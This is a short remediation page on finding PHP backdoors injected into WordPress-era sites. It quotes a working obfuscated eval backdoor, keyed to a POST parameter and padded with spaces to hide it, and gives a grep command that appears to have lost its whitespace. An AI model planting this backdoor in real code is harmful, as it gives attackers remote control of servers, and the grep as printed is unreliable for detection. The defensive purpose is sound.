PHP Hack Fix
Typically, these PHP hacks are uploaded remotely through an already opened exploit such as an old install of WordPress. Remote exploits allow for arbitrary code execution which can do various things including adding backdoors to all .php files it encounters or by uploading a payload to the server to spam.
This page will contain the methods used to detect and remove these scripts.
Searching for Backdoors
The simplest backdoor which gets injected to the first line of a .php file looks similar to the following. The code does not end with a newline, which means that the beginning of the original file will begin immediately after the ?>.
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q945107'])){eval(${$s20}['q945107']);}?>
The code is prefixed by 255 spaces, probably to hide the exploit if line wrapping is disabled. This makes it quite easy to search for this exploit through a simple grep:
grep -iRl 'php ' *